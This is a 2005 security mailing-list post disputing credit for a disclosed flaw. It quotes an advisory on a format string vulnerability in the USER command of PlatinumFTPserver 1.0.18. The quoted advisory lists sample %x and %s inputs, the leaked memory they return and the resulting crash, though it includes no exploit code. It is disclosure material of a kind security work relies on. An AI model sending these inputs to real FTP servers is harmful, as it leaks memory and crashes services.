Re: PlatinumFTPserver format string vulnerability ( IHSTeam )
Actually, the credits don't go to you, these vulnerabilities have been found
already. I've replied recently to this mailing list in regards to this
software.
If you had disassembled the binary, then why not mention that the
vulnerability exists in a 3rd party ActiveX control, and not the software
itself?
My reply,
http://www.securityfocus.com/archive/1/393256/2005-03-13/2005-03-19/0
Please read the links below,
http://www.osvdb.org/displayvuln.php?osvdb_id=3461
http://secunia.com/advisories/9127/
http://secunia.com/advisories/10608/
http://secunia.com/advisories/9013/
-Gary H. Jones II
----- Original Message -----
From: <c0d3r@xxxxxxxxxxx>
To: <bugtraq@xxxxxxxxxxxxxxxxx>
Cc: <news@xxxxxxxxxxxxxx>
Sent: Wednesday, March 16, 2005 8:56 AM
Subject: PlatinumFTPserver format string vulnerability ( IHSTeam )
**********************************************************************
advisory URL : http://www.ihsteam.com/advisory/PlatinumFTPserver.txt
**********************************************************************
********************************************
IHS Iran Hackers Sabotage Public advisory
by : c0d3r "Kaveh Razavi" c0d3r@xxxxxxxxxxx
********************************************
well yesterday a guy found a simple user overflow in PlatinumFTPserver vr
: 1.0.18 and prior.
I downloaded the package at :
http://www.roboshareware.com/products/PlatinumFTPserver.exe
and started to disassemble the vulnerability . He was written a DoS .
PlantiumFTP has got a good error controlling system . so eip overwrite is
not easy .
but I found another vulnerability when I was fuzzing .
the server is also vulnerable to USER format string attack .
here is the result :
---------------------------------------
C:\Documents and Settings\root>ftp
ftp> open 127.0.0.1
Connected to 127.0.0.1.
220-PlatinumFTPserver V1.0.18
220 Enter login details
User (127.0.0.1:(none)): user %x%x
331 Password required for user 026d0048.
Password:
---------------------------------------
ftp> user AAAA%x%x%x%x
331 Password required for user AAAA026d0048020313333.
Password:
---------------------------------------
ftp> user
AAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x
331 Password required for
AAAA026d00480203133337373615064726f7771657220657269756f662064414120727825414
1782578257825782578257825782578257825782578257825782578257825782578257825782
5782578257825782578257825782578257825782578257825782578257825782578257825782
5d2e782512000a77f5508212cdd812ce1012cdfc12cdb01305dc012ce00.
Password:
---------------------------------------
ftp> user AAAA%s%s
331 Password required for AAAAÈsÈjÈ{PÈ` .
Password:
---------------------------------------
ftp> user
AAAA%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s
hanging ==>
szAppName : PlatinumFTPserverEngine.exe szAppVer : 1.0.0.18
szModName : user32.dll szModVer : 5.1.2600.1106 offset : 00008f7f
The instruction at "0x01606feb" refrenced memory at "0xaf613daf". the
memory could not be "written".
---------------------------------------
and these kinda playing !
I am busy with university etrance exam stuff so I cant write the exploit
code and really it doesnt cost .
well laters . and this will be the last sweet to IHS until my shitty exam .
all the credits go to IHSteam.com .
greetz fly to : LorD and NT of ihsteam , Jamie of exploitdev.org and other
friends and security teams .
well I will come to u later shervin_kesafat my great lamer !